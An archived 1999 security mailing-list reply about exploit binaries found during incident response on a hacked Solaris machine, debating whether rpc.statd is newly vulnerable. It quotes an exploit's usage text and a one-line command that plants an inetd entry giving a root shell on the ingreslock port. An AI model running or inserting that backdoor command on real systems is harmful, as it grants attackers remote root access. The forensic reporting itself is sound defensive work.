Re: Vulnerability in Solaris 2.6. rpc.statd ?

From: Bob Todd (toddrat_private)
Date: Tue Aug 24 1999 - 11:10:40 PDT


    I found two binary-only exploits on a hacked machine.  The one of most
    interest was "amexp" which when executed without arguments presents
    the following:
    
        Usage: ./amexp address cache command type [port]
    
        Further help:
    
            address    -    system address
            cache      -    system hostname
            command    -    execute this command
            type       -    0: Solaris 2.5.1 stock,
                                1: Solaris 2.5.1 patched, 2.6 & 2.7
            port       -    optional port to bypass portmapper
    
    A shell script that was included was "go.amexp" which contained:
    
    ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
    /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3
    
    The command is nearly identical to what is used for both tooltalk and
    rpc.cmsd attacks.
    
    The proper patches were installed and I do not believe that it is the
    statd/automountd exploit since no indirect rpc services execution was
    attempted.
    
    This incident is closed.
    
    
    
    ----- Original Message -----
    From: Tabor J . Wells <twellsat_private>
    To: Bob Todd <toddat_private>
    Cc: <BUGTRAQat_private>
    Sent: Tuesday, August 24, 1999 1:52 PM
    Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?
    
    
    > On Sat, Aug 21, 1999 at 12:31:18PM -0400,
    > Bob Todd <toddrat_private> is thought to have said:
    >
    > > While performing an on-site incident response at
    > > _______, I found several
    > > Solaris-oriented exploit programs including a
    > > statd2.6 (others were calendar
    > > manager, tooltalk, and lockd?).  Since there is an
    > > exploit program for statd on
    > >  Solaris 2.6, I could conclude that Solaris 2.6
    > > statd is vulnerable to attack.  I
    > > have not tried the exploit, but since the machine
    > > was probably compromised
    > > by one of these programs, the threat seems real!!
    >
    > And did this server have the statd patch installed (106592-02 on sparc and
    > 106593-02 on x86)? Did it have the various security patches for the other
    > services mentioned installed as well?
    >
    > Perhaps the program was part of the exploit which allowed indirect RPC
    > calls with statd that was discussed here (and elsewhere) several weeks
    > back.
    >
    > I don't think your conclusion is supported given the information you
    > provided. Perhaps you could provide more information about the exploit
    > before rushing to claim that there is a new vulnerability.
    >
    > Tabor
    >
    > --
    >
    > ________________________________________________________________________
    > Tabor J. Wells                           twellsat_private
    > Technology Manager                       http://www.smarterliving.com
    > Smarter Living, Inc.                     It's your time. It's your money.
    >
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:52 PDT